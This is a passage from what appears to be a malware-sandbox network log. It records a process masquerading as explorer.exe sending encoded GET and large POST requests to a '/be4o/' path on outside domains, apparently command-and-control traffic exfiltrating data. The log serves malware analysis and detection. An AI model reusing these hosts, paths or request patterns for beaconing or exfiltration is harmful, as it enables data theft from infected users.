                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552561045 CET11225OUTData Raw: 6a 34 35 79 79 75 4c 5a 6e 41 4e 62 37 32 77 54 55 4f 42 43 45 39 6a 35 44 7a 31 4f 72 52 65 6e 35 57 64 31 46 35 4d 5a 76 36 5f 7e 64 7a 56 74 55 41 53 30 72 76 5a 5a 4b 4c 67 62 67 6c 58 41 72 61 5a 47 6d 70 42 77 65 7e 73 55 65 54 6f 42 72 47
                                                                                                                                                                                                                              Data Ascii: j45yyuLZnANb72wTUOBCE9j5Dz1OrRen5Wd1F5MZv6_~dzVtUAS0rvZZKLgbglXAraZGmpBwe~sUeToBrG2YjJiHcZvDEzTZcSoPQI2uPhX0ElndfWJoVk3tFyy07Qie4zqFBvYWV34mjB-EI2Xt12yvktb15DiKWBHuNJLR_qLSubSytf_E3EsaHIFaq0dvS7aLvuk1jpcSPG4mOjA402xDxzMCJ5TYiX59TnYf5BN4PBfvBue
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.552639008 CET11228OUTData Raw: 6b 61 4e 76 58 52 73 6f 48 32 76 37 4d 78 42 47 35 70 72 37 6d 59 4b 6e 45 35 41 51 50 4f 75 65 5a 59 6a 55 64 37 57 6b 6c 69 61 6b 37 38 76 6d 66 4a 66 59 54 54 44 52 58 39 73 28 61 36 5f 4a 76 6d 6d 62 51 71 70 59 53 30 6c 50 6b 57 71 6e 73 4f
                                                                                                                                                                                                                              Data Ascii: kaNvXRsoH2v7MxBG5pr7mYKnE5AQPOueZYjUd7Wkliak78vmfJfYTTDRX9s(a6_JvmmbQqpYS0lPkWqnsOdcDGs3qXo2CDs6Y1s3C2KapTU9CKZp9EK8F~Vm11udeNjB8I-ib5O9EgDvFTA3aBYyoQ-OZP0pVqWuAed1-s7SlDOm172sh4ufqgnu_yUX_hkhGg-ycgx5f9bbqi63dRUAn12pG1n8zQiSgYiESKOfAvNo7jhHg3c
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553036928 CET11229OUTData Raw: 50 33 39 36 70 53 35 33 41 4f 6e 4b 46 61 31 6d 74 4f 6c 70 6f 73 77 69 30 61 6f 39 31 6e 71 4b 69 61 41 78 66 4d 68 43 41 64 63 48 63 4c 51 68 74 45 74 4a 70 49 45 39 6e 55 4c 67 50 55 74 6d 52 54 68 78 36 68 47 43 66 78 37 59 69 4a 6c 34 66 65
                                                                                                                                                                                                                              Data Ascii: P396pS53AOnKFa1mtOlposwi0ao91nqKiaAxfMhCAdcHcLQhtEtJpIE9nULgPUtmRThx6hGCfx7YiJl4fekcW5cIDC-NWhZmLDju8w0n2v6ly5CxHsdrdY4HxsZa-1IlUjPh0~khgBtGn5fZAEtp991tvKxmbRI1DhzLVV1OuIBrQj6ualssqTP(5w9FIg99JFd2RbKSEs2X3je1IMjhSgc7oHxJsCjuR5y~ySRjG7zSC745oxS
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.553215981 CET11233OUTData Raw: 32 54 64 6d 61 43 72 34 77 45 50 53 7a 62 72 39 67 50 32 6b 32 79 4f 7a 6d 69 44 37 77 6e 64 59 36 71 44 76 48 7a 59 78 2d 68 57 69 55 5a 71 44 55 46 50 79 42 37 74 76 76 58 54 7a 78 31 72 71 54 74 6b 4f 71 71 36 6c 56 41 64 6c 5a 45 78 39 7a 43
                                                                                                                                                                                                                              Data Ascii: 2TdmaCr4wEPSzbr9gP2k2yOzmiD7wndY6qDvHzYx-hWiUZqDUFPyB7tvvXTzx1rqTtkOqq6lVAdlZEx9zCoqt(ioiOUCKWWgUSOZmKqH6GS76AS8jvH(v0_IjrvSR(SP5kSslYwm5mxiNcSW8C9URsPBcSfNVCxPVsJcZC2gBaQOPwYwnZikLioz_H0cmCX(aON2CnynsbQHHKeZqMCe53DHOSQZNZfz-4i0Mx6mm1HY9dkO61O
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718512058 CET11239OUTData Raw: 78 36 6e 64 79 6d 4a 75 58 52 37 64 38 45 76 79 49 6c 31 4d 46 48 54 63 47 7e 63 66 32 50 35 4a 52 41 31 71 35 34 34 41 6b 36 55 47 79 4f 72 52 38 4f 33 4c 57 6a 74 48 73 4f 64 54 62 6c 6c 59 41 75 6f 43 43 79 39 32 4f 70 43 49 6b 4b 2d 34 7a 38
                                                                                                                                                                                                                              Data Ascii: x6ndymJuXR7d8EvyIl1MFHTcG~cf2P5JRA1q544Ak6UGyOrR8O3LWjtHsOdTbllYAuoCCy92OpCIkK-4z8FFhy7LFp1STOY9ReoQs5zr9gSR0Pamp0QkPYsq9fijWUATUlsNY90yDEUesEvxq5ckPhm5ITtN1eDKwURJ7iIdVmEM1Mqg8tPxEOULPpD25EEEEvOvj8hTgCzNV3mRHxAlFhkKC4MoO4dVcvR(Y81JNVz245Yxb2Y
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718641996 CET11245OUTData Raw: 35 63 4f 6f 39 46 75 6a 55 70 65 64 6c 72 56 6f 69 73 37 49 6a 42 79 57 70 37 75 44 5f 70 50 47 71 49 52 62 73 45 7a 4b 53 54 37 4f 72 66 6d 36 61 50 36 66 48 4b 78 69 6c 66 6f 66 68 61 78 36 6f 6c 4e 77 47 7a 73 34 37 71 7a 35 30 4b 42 6e 79 64
                                                                                                                                                                                                                              Data Ascii: 5cOo9FujUpedlrVois7IjByWp7uD_pPGqIRbsEzKST7Orfm6aP6fHKxilfofhax6olNwGzs47qz50KBnydyYhuTeKRUJksdYi7lgfk9urlErA8qjVL5bq6k7oujGm8SengCduN_o6QonnsTiw8KMxx_ecBiVUYaSN9PPP8Dn8S1TC(TnQthRJFWIeBI11j8baoDCIMsEbaM1gGZ2LZ6OX9s4HumAu8XJZGJrASCAJHOSdv8ero6
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718839884 CET11252OUTData Raw: 7a 46 4d 68 6f 56 41 31 42 71 2d 48 50 75 55 44 2d 59 31 71 5a 51 34 57 37 36 70 4d 45 55 4a 68 6c 6f 55 42 37 4d 75 44 63 63 64 6c 45 45 4f 31 46 39 41 74 67 30 6c 38 31 45 62 59 77 46 6f 4b 31 4a 2d 36 70 39 6f 6f 32 4a 41 37 4e 6e 5a 5a 44 68
                                                                                                                                                                                                                              Data Ascii: zFMhoVA1Bq-HPuUD-Y1qZQ4W76pMEUJhloUB7MuDccdlEEO1F9Atg0l81EbYwFoK1J-6p9oo2JA7NnZZDhZdOCJORCcb607PtNLXeI_YSZI64BKW_d-7G2lgFpJTvvaeTHxHhN-okQPxj~a(55-9tSLLl(BE-UJM4i_FaB9rirQs8V0vhCandpa3YF8E_wVEJRSVGXM31MQOKZUpmJR3BaMT68hAVupf4ptFECOyT5vxrLsBNgi
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.718993902 CET11255OUTData Raw: 6f 4b 77 72 41 66 4b 52 68 76 4e 38 49 43 4c 6c 4b 43 75 6f 4e 6d 52 51 56 53 4f 43 34 73 67 4c 6c 4d 58 28 75 64 73 5a 30 71 45 66 63 32 39 33 46 53 38 59 77 36 4d 44 6c 6a 67 7e 34 79 51 30 31 37 4b 55 4b 51 4b 63 30 68 35 52 47 44 76 75 4b 7a
                                                                                                                                                                                                                              Data Ascii: oKwrAfKRhvN8ICLlKCuoNmRQVSOC4sgLlMX(udsZ0qEfc293FS8Yw6MDljg~4yQ017KUKQKc0h5RGDvuKzlacxy3HivCqyPACpWlQnxqwBSenA9TY5c5I1X9BQnqI6dy1u8(kfTFIJihC(93raPvZ89c5vdooUTtJAHhWwrnUN4wRtKNjWNS5To4EgWqPQdb6jJuGgSWdbA1S~A4FS_L4u6FNPV0Mvbto(uKLhmBvdiIPn8rJYC


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              51192.168.11.204985245.195.115.7180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:59.557224989 CET11234OUTGET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.123399019 CET11370INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:00 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              52192.168.11.204985434.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.086414099 CET11383OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.noireimpactcollective.net
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.noireimpactcollective.net/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 67 55 6f 51 71 79 6e 6b 4e 7a 56 38 46 51 33 64 66 52 47 55 6e 45 75 54 68 50 6d 4c 76 75 55 52 4e 58 41 35 4f 6d 30 75 69 4b 6f 4c 32 69 49 43 6c 57 68 50 53 6a 43 32 53 43 6e 56 63 48 48 49 43 59 4d 42 66 51 77 4f 62 50 5a 63 59 6e 67 6f 6d 34 34 44 31 79 28 46 4d 47 62 70 4c 55 56 76 30 74 72 6a 67 57 71 71 76 37 5a 55 50 39 5a 4f 50 43 4c 44 76 59 64 51 28 6e 30 4c 69 44 75 58 6d 78 58 49 4d 2d 35 41 7a 4f 55 54 45 73 38 33 7a 47 6d 52 36 6b 61 47 4c 52 56 43 7a 51 58 42 42 6d 36 2d 59 78 33 79 6c 57 64 65 7e 2d 41 4d 4d 6f 70 34 35 34 51 43 48 6c 4a 6d 71 71 68 6c 70 72 79 6f 50 52 65 4b 71 35 4d 66 35 63 53 4c 39 65 6d 55 28 6f 34 67 36 73 7a 58 52 59 76 34 71 45 36 35 58 41 6c 6e 64 58 50 4a 61 6b 41 6f 7a 32 7a 32 63 33 38 35 76 43 76 56 55 69 61 39 77 4d 55 6f 42 54 4d 41 64 55 53 4e 63 47 7e 74 77 54 67 35 6a 50 76 66 28 48 4c 66 71 53 55 30 47 32 39 61 41 48 30 73 45 32 43 76 65 6f 58 7a 54 71 69 61 36 64 30 41 54 69 74 5a 28 49 38 47 32 44 34 4b 77 30 57 48 57 37 38 71 54 45 57 37 61 6d 28 69 77 52 42 55 65 48 6b 6a 58 77 69 42 71 62 48 78 63 58 66 65 37 65 78 4e 78 4a 6c 7a 53 70 6f 63 4b 52 28 72 42 46 70 34 39 38 69 46 46 4e 55 63 4f 4d 66 33 57 37 37 63 37 75 39 31 71 74 35 36 38 41 38 5a 78 73 38 4b 62 58 59 35 61 45 65 52 6d 5a 4f 57 7a 73 28 39 75 47 4e 7a 30 4d 63 58 30 33 5a 4d 68 66 4c 6c 44 59 62 52 64 4e 62 76 46 57 54 64 38 6b 63 68 73 34 67 45 67 42 55 65 76 52 54 32 6b 61 46 32 42 4a 33 50 34 73 39 4a 39 44 70 46 30 56 39 58 54 4d 30 44 36 61 43 4b 54 36 41 63 71 66 37 49 56 76 55 61 51 30 4e 71 44 30 69 42 47 5f 6f 30 48 79 31 72 69 56 57 4c 64 69 6e 5a 75 51 45 30 43 4a 48 43 28 43 4b 30 70 46 38 34 53 67 55 4a 35 47 55 51 57 32 54 79 43 4c 7a 66 37 65 53 43 53 53 44 50 58 68 53 68 36 36 79 43 45 33 73 50 28 6a 57 48 54 34 66 4e 65 78 42 58 4d 46 7e 2d 32 73 64 66 52 75 66 57 66 39 6c 57 65 77 68 72 39 57 43 43 6e 45 30 43 6e 47 79 5a 55 2d 35 79 48 74 6e 5a 4e 4f 4a 77 68 44 57 63 4a 69 4e 43 70 5a 59 44 55 44 57 55 64 77 75 6c 63 49 56 70 66 45 44 4c 34 68 28 67 63 49 59 77 51 4e 71 47 75 31 35 44 68 2d 68 47 5a 57 49 65 39 63 64 39 41 36 61 74 74 74 56 5f 46 36 6e 57 69 2d 41 6e 7a 36 59 41 36 59 44 71 4e 49 71 75 61 69 54 51 33 47 57 6c 61 62 58 67 7e 6d 36 46 31 6f 4b 30 35 4e 6e 37 38 79 39 31 75 68 67 4d 4a 6a 7e 6b 48 62 61 7a 36 50 37 4a 44 4b 77 55 67 64 6d 4e 65 43 6b 54 4e 6e 62 69 62 34 72 38 31 64 35 56 55 5f 62 72 46 64 41 33 63 69 68 45 52 57 51 58 64 62 72 6b 4a 4e 43 6c 65 39 68 32 6c 50 75 45 4d 54 36 34 6a 61 28 52 48 50 61 35 50 7a 4f 77 39 6c 79 32 33 4c 64 43 6d 59 33 46 4e 49 6d 54 6e 68 7a 68 5a 77 6b 70 4c 71 6c 6e 34 70 52 5f 39 67 6e 41 47 74 49 49 4d 64 55 33 74 42 49 48 55 56 37 57 28 58 64 42 62 44 78 56 79 4f 65 6b 51 70 63 56 67 73 7e 6b 4b 31 6f 30 36 32 28 63 45 50 56 4d 70 5a 57 58 4a 74 74 32 42 6f 46 6a 48 45 69 67 65 64 50 76 70 55 39 76 51 6e 4d 4e 28 54 4e 75 31 67 6e 79 6f 52 66 34 55 78 4a 30 48 73 48 41 36 35 57 4d 4e 78 31 63 7e 31 64 63 33 46 67 79 79 62 41 36 37 52 72 78 37 33 51 43 5a 61 47 30 61 41 58 5f 66 76 52 4e 79 55 63 45 4b 4a 6d 64 5a 57 55 66 56 34 74 39 79 66 6b 72 65 41 71 56 36 42 75 79 73 54 28 64 63 49 43 70 58 72 50 65 6f 49 57 54 61 7a 47 4b 79 4d 67 50 6e 74 32 71 39 5f 55 74 47 33 73 34 53 33 61 4a 62 39 71 66 66 4a 6b 52 4a 4b 79 5a 34 45 78 35 65 43 58 6e 4c 56 57 76 64 6d 68 58 37 4f 61 4f 6f 41 75 62 6d 2d 37 55 28 50 32 51 30 30 35 67 65 52 66 76 38 6c 41 30 6c 36 36 6e 59 57 78 52 57 4e 4d 37 6e 71 42 56 59 4b 7a 73 6b 36 74 62 47 45 67 5f 6d 67 35 73 51 6e 78 59 51 39 41 6f 46 50 76 59 42 4e 66 73 75 77 73 65 41 76 57 4f 4d 66 52 31 4e 6c 42 76 71 2d 6a 38 37 2d 31 49 4a 35 68 6f 79 78 47 41 43 45 43 76 49 4b 4a 74 37 53 62 4c 74 37 74 41 54 76 4f 54 7e 32 65 66 5a 42 37 56 75 62 41 4f 45 34 41 35 65 51 4f 64 7a 79 72 32 67 47 47 56 47 71 58 65 72 69 32 75 4b 74 5a 49 39 32 32 73 46 61 62 34 33 52 74 43 30 70 63 69 67 48 37 5a 35 70 67 72 47 48 39 6b 76 70 41 55 34 78 30 30 58 50 46 68 4f 73 44 47 46 6a 65 32 36 66 75 6b 4b 66 58 35 50 6a 42 4c 52 57 58 4e 4f 6a 39 43 48 4d 37 6e 73 35 75 64 70
                                                                                                                                                                                                                              Data Ascii: h48Hl=gUoQqynkNzV8FQ3dfRGUnEuThPmLvuURNXA5Om0uiKoL2iIClWhPSjC2SCnVcHHICYMBfQwObPZcYngom44D1y(FMGbpLUVv0trjgWqqv7ZUP9ZOPCLDvYdQ(n0LiDuXmxXIM-5AzOUTEs83zGmR6kaGLRVCzQXBBm6-Yx3ylWde~-AMMop454QCHlJmqqhlpryoPReKq5Mf5cSL9emU(o4g6szXRYv4qE65XAlndXPJakAoz2z2c385vCvVUia9wMUoBTMAdUSNcG~twTg5jPvf(HLfqSU0G29aAH0sE2CveoXzTqia6d0ATitZ(I8G2D4Kw0WHW78qTEW7am(iwRBUeHkjXwiBqbHxcXfe7exNxJlzSpocKR(rBFp498iFFNUcOMf3W77c7u91qt568A8Zxs8KbXY5aEeRmZOWzs(9uGNz0McX03ZMhfLlDYbRdNbvFWTd8kchs4gEgBUevRT2kaF2BJ3P4s9J9DpF0V9XTM0D6aCKT6Acqf7IVvUaQ0NqD0iBG_o0Hy1riVWLdinZuQE0CJHC(CK0pF84SgUJ5GUQW2TyCLzf7eSCSSDPXhSh66yCE3sP(jWHT4fNexBXMF~-2sdfRufWf9lWewhr9WCCnE0CnGyZU-5yHtnZNOJwhDWcJiNCpZYDUDWUdwulcIVpfEDL4h(gcIYwQNqGu15Dh-hGZWIe9cd9A6atttV_F6nWi-Anz6YA6YDqNIquaiTQ3GWlabXg~m6F1oK05Nn78y91uhgMJj~kHbaz6P7JDKwUgdmNeCkTNnbib4r81d5VU_brFdA3cihERWQXdbrkJNCle9h2lPuEMT64ja(RHPa5PzOw9ly23LdCmY3FNImTnhzhZwkpLqln4pR_9gnAGtIIMdU3tBIHUV7W(XdBbDxVyOekQpcVgs~kK1o062(cEPVMpZWXJtt2BoFjHEigedPvpU9vQnMN(TNu1gnyoRf4UxJ0HsHA65WMNx1c~1dc3FgyybA67Rrx73QCZaG0aAX_fvRNyUcEKJmdZWUfV4t9yfkreAqV6BuysT(dcICpXrPeoIWTazGKyMgPnt2q9_UtG3s4S3aJb9qffJkRJKyZ4Ex5eCXnLVWvdmhX7OaOoAubm-7U(P2Q005geRfv8lA0l66nYWxRWNM7nqBVYKzsk6tbGEg_mg5sQnxYQ9AoFPvYBNfsuwseAvWOMfR1NlBvq-j87-1IJ5hoyxGACECvIKJt7SbLt7tATvOT~2efZB7VubAOE4A5eQOdzyr2gGGVGqXeri2uKtZI922sFab43RtC0pcigH7Z5pgrGH9kvpAU4x00XPFhOsDGFje26fukKfX5PjBLRWXNOj9CHM7ns5udpXEQUSo1s93IoqymO699v1WXJMvzuh5z5h5geIZpwAotFUOTrthltcv8tQPhQwT0vtjsfB9AncusnKsWhw6LdlqVoIWNDXBEsVEo(MnVIrvzW9HFMGT2AhPlMQAqkCdbHzFag_Dg5H(-qyJJk05rTpddMeKNtmnMMEVL1r3S9KC6P9OZOsW996sHQHIGdoUz3ES8Cu2-GnJRPxqlFGApTjn3UIIttyfLlcXXb_MlzZSpP8VLsiK35BEzjYEdSTfot5bwD091VFy6SLVqcs0kOmWFUPLSlxDenLTl7qcx41SEmngHiyJ_kOHvTj61GvaDE4oGPRPCxZJ-RZWgLQvrSQTOmcrAsRPIuH8-hWlv46ygv_uCwsvl6uiu(7QlcLKDKvmcw6hOMk8Rwuw0dCLOUx8Hr7v8tfDWkMl357iiwDiuUPxSMt5k(m(BQ-lBHWhLSZhbSLm_66HLlzAsihGd2ttNjHd-9WSnsxILasL-CIv9N2StswLltA~oHrobU1exey3F4be-S5U2Lr~frXwi9gsM1vFrKjjl9CHxWUAwmmG974tTTFvrj7fSIRVdMcxyr0jXM4axuNShLp7T00K0z4~wqAAIm4Cs(6lWonOhIMG2cV87r0t-y_UM6ppTw8V8V-h751mIJuT6DfED5DT9~PBd7TTowgr4HnxMAHfzPWdo2D3a5KPiLkRm3-n12mC0v7y9KByU5OycCM4XGuzOg8TtojTJw9V_7gDIK6dx59c89KolJrUjO9LprnSByL42zFW-8V4N8Uc5eHpcQUTCjVnpuA6k6kM40BjWw0Mb5tpk3KrLGSpOzndE73fCnK2eMZrXwPWAHnxasAz2uYjx76bUO9Y8X8ddtwHoFygcgucUbRMIl_7JDK0rVmgEyLfJEPoYDW(z9vmlRK(EqIGJfZ~uWfIJ0KDvoO1ioO(0edZdqvKbHfHaOy3BCX2xAXY5XURAtEa-CEm-VrUQa_abuPnkstsBj3Xkg9lA7HxtryaOfKkdkFQYvbcPmAharBQIM7YdxzGWNxDfwn7bcIfYhrEMQEocwA4gpMzW82ap~Mvogodzb7lLaZOoaurACjmE0curbV6BDpyaMvKH6CZzEphNt8U12T0b(9KrWrv-ZCIiTE(mKbjkXxTitWkHvPU6hPSxAi5RPJYmdRGb8K9EtbMxvs6JSFlK8hFfTUZaJBVixCco1dH71uJ8bgLjXJXBnBxmLIQpHx5Bj-pMM52ysTcr20HPotn_~HpyoLl4cARAEfo4YbDFYQ~9qMB48QLOFK13HyYc77ckCm2rEF4Xf391LQKk21Z1xb4twuYtaTxMj6BVmYZ6VIKruH4jvBHYLJtZ3gtDzJehh4M7S8jU6Su9b70QcfvvMWOADxiBU61sPcXrjhOnGpnxlfifBv3r1uyCZBSGqvMp8gR2yj6049n9lZXbeDQ5j2r3U-sSrD7IrCvOS4X6BmKdTIN2rAzsV9eTSe0XkVXtXWGnAyqh0PeHBkEdbtgbmrBcz1IxO-TeSmYu(33ZW6BOQ8ZB6BIEQmvrnMhs5ZHxRq5p0SUzVCDECVUxeg0smVuomKbnOu(Pcy6Y3dUdZPj478fK0qlDzYXuuV9FK_Tcr11QGbpTXyA-6B6SCexxnCysimedhEBeB2FSxZnR(LLRGypQaJ2_WuRx~iLsvJqAEEI-eE~CaWAh4CdGRV6fwSP6PuuezJD6nktTeK1XgWsJbT5-(YKoEc6ITxANcGqO8USuOgFikFKXiF1qylawZCniYVIEKKbXCNPEDIKn4kYQbpY1KdL15oPzjt2qpi3GJttMbP(ARk~tdhGcsU5eTe3XmPBxEsKA3Wk7dOEBk4(FJnmcu2f-04VF5gUPYbnS9d(xryaowQrQZlGGutFBpHDYgXCBOrB5tETUF9Cu8G5c5Co6cuR5dOPBtkJ6nTIyOQ3L5XkaJKmnUafdDL2uMBcH5UD6tT(gPMiHJKq03hjnWU1MO6pxESAojEXA(okJ9iOcVPPqaDRMv4EXQhrI9YkUB6b0506ruG3ragmYZ3fDY8AXKw9tBBn7a94UU8NPAwew2I1yvc9B3PvBH8b1k29k7yeGAadiDDjBFD~4HfTxZwUKByT4Xmo_q1zDtd5zgunh5waF14IcVXHNZjIyatEJzewFaLOkd2c8ygeOvi5-5w7QUIn1RAz-f4(ZkcvKB6OHPHRBEmUCrgjJevCrzyeChMNkv8jOn6vgS-ULyvubzkXADmO9AIiqITbyumc0ErT0OOHh1ntmYnlAXHmHnOZWtUcOr6TX1my-Pwq1n3RoEWLRp03JJZtK1DJOrk6DLZZUUjd3GwQKCiM9vuKWCGcvOULiI1Sq5UGrE0l9f579F8ycwWB6VBAielF5YtKxj_pwE1c3UZWboSjlDrekToesZ93lIXaw5H2v6WTbqye5DViFAz2hYvx1ufSnWg2s1vQoIrb9rB2u~XVF6Bzp26rz44GWMjyvdzBGI9qTVU34Q_Q-ixLNkIPKvztVs-szdWjEF0jtTyXkvS~veFyEZBbFChPAOheQYUS-scr5r7b1gTGn13G1OO3tk7cYLiK_LyZ_z2(T46BLEYknq_sAFjWnyBqpISNw9Cei0hd4eAxdXs75xNzpZIcNpUMQxp0YF13h3P62osP5GfXKjapmaj~BvGLYNCSA4T77mw7Tp0Fk(JALARdhqNpB~WfWt1GvZxyAEgrCyDIDo1Lcn3TtuY0A
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.086520910 CET11390OUTData Raw: 6b 6b 6c 4b 4c 77 52 78 43 42 52 50 72 62 37 34 31 78 41 69 30 66 31 76 4c 50 69 65 4c 4e 4e 55 6d 6d 31 69 67 68 32 4e 32 5f 36 35 57 46 39 61 43 75 44 6d 39 6c 65 77 68 6c 41 47 6b 2d 48 4f 42 65 56 53 51 59 6e 53 30 75 6c 78 6e 68 7e 70 6d 64
                                                                                                                                                                                                                              Data Ascii: kklKLwRxCBRPrb741xAi0f1vLPieLNNUmm1igh2N2_65WF9aCuDm9lewhlAGk-HOBeVSQYnS0ulxnh~pmdKFjx~XBaLDXPf2stp_I59hGU90eFvvGjPFBRSNHWSgHKlCa5dFNf0QkPHBMSugjHdTImynX_qlxM60HPee21aTYCE6Nx2J4juUXe6FNej0ekXfMOCc3AsJDN8B5-E4ZcXe308k2Ij9vWPLmrqxcPrzxaCYE1LcJ-R
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097281933 CET11398OUTData Raw: 77 5a 45 6e 7e 50 4a 6c 68 39 46 62 6f 56 6d 49 76 6b 69 6b 47 52 52 6f 7e 43 6a 35 49 68 4d 62 35 72 49 73 55 55 30 49 4a 2d 7a 30 73 38 56 46 32 78 4e 75 36 71 32 72 72 4e 73 4b 72 76 69 44 53 45 79 72 78 33 74 41 36 39 4f 65 41 4e 6c 76 7e 4b
                                                                                                                                                                                                                              Data Ascii: wZEn~PJlh9FboVmIvkikGRRo~Cj5IhMb5rIsUU0IJ-z0s8VF2xNu6q2rrNsKrviDSEyrx3tA69OeANlv~KrJHK9DwJ1zMW7h0HNkpUNpEpfoXs1VZIyPPLHhUM9gcM2ZYbYT2sZHCspPnge_kCTItt4AMdU5zBeEyTXjsTSZLTRccMgvKj9jj5m-nt51DUVDqkxsCPlfE0JC1PR3dtifOmRsC-0otmVGYZvTinu2v-bGVPGAbOI
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097384930 CET11406OUTData Raw: 70 52 48 31 76 4c 41 61 73 39 78 30 30 6c 5a 42 6e 6b 34 62 41 6d 6a 64 47 72 69 7a 7e 39 33 4e 6c 36 7e 41 61 77 6f 72 65 56 79 75 4f 44 6b 4b 41 62 73 37 48 57 6b 58 51 2d 63 65 78 41 56 48 4d 5f 53 6b 6f 54 74 61 79 6e 63 51 66 63 28 57 79 6f
                                                                                                                                                                                                                              Data Ascii: pRH1vLAas9x00lZBnk4bAmjdGriz~93Nl6~AaworeVyuODkKAbs7HWkXQ-cexAVHM_SkoTtayncQfc(Wyo8Hmmdyx9C4UaOAGP4otA8cjNKsM7qp2FJl3oqY90Lk5I8NL_TelrNrtd2LQrKmMJwY6pDZp9X-t9THkspab9tti6wf7apnqL(BHxGHjlTHF-ejWzBvnx(cXgXTfzqacoYFSC4nGcBXK6HG8gwVBc~xbIXzQfcmj0W
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097662926 CET11409OUTData Raw: 43 56 32 6c 55 71 33 34 34 69 4c 79 6e 38 5a 6e 54 6f 32 71 34 34 42 4a 4a 34 78 35 4f 48 57 6d 30 4d 43 44 54 67 65 4b 6c 53 37 2d 37 43 58 63 66 4e 70 51 57 55 66 43 69 72 4d 6f 65 69 36 4f 7a 50 66 33 34 79 76 38 7e 69 59 65 7e 46 76 35 79 42
                                                                                                                                                                                                                              Data Ascii: CV2lUq344iLyn8ZnTo2q44BJJ4x5OHWm0MCDTgeKlS7-7CXcfNpQWUfCirMoei6OzPf34yv8~iYe~Fv5yBsRkQRt0daFGqx22q2sHL7L52XjiTWGbnHMvKbveVNbE_d7Dk0lLjYsPaf_D7ip0xvlFJeyHVTeEtReSmxNknXunI95FRa-O1wcBNAXPKo_IdbJovgwmX7WuJZu8k0oYdjmTrSpYDQUbCQE0_6xvmoxXYTn6sEj(5L
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097843885 CET11415OUTData Raw: 4a 50 56 61 52 34 71 48 6e 51 65 36 72 55 70 41 48 70 4b 68 30 75 35 32 59 45 5a 62 44 6d 65 4f 43 35 7e 71 69 75 51 2d 62 58 77 65 6a 31 78 6f 74 78 6b 63 76 53 4f 66 41 77 69 30 43 78 4a 45 50 47 4a 67 38 56 4c 5f 4c 66 6a 77 6e 57 68 45 43 4a
                                                                                                                                                                                                                              Data Ascii: JPVaR4qHnQe6rUpAHpKh0u52YEZbDmeOC5~qiuQ-bXwej1xotxkcvSOfAwi0CxJEPGJg8VL_LfjwnWhECJ0Pzsv0Rc2wvqAfBD(0vKY6agM-4eq0CruGdYly2SSeq4iZ~09GuecKQqPpnnYUpdBPApQW5b45wvkMrPcCmQnAk-73M9nuKOL1uUIU3_c1nzWovjlbujY3lWASq2DvFqD617OfH11TSbvy~uYa4KAfAPP9XPYsicC
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.098160982 CET11416OUTData Raw: 4f 39 74 6a 62 53 78 68 78 74 63 34 4c 51 38 76 47 44 70 33 52 51 42 31 7e 70 41 39 66 57 7e 55 74 4d 78 70 55 58 48 50 67 36 6b 56 4f 73 57 75 46 44 58 48 77 30 4e 68 47 50 4c 72 6d 4b 43 50 53 31 61 35 6f 59 35 5f 6f 66 45 69 74 6c 7e 74 5a 65
                                                                                                                                                                                                                              Data Ascii: O9tjbSxhxtc4LQ8vGDp3RQB1~pA9fW~UtMxpUXHPg6kVOsWuFDXHw0NhGPLrmKCPS1a5oY5_ofEitl~tZexf8TTSd0V5yzZVwutHEK5bttoQQlXrONA000pqs3Skdp3hMgmU4OSLK884HnLrtUwhAyQUGztAF797dWtTvPCDV2x96rtpf0Oo~ON7nComeHLnmzV_7VHUMl2GLX4SNo1G8szFDmu0fwT8rvV6iglV(Kru7Blqud6
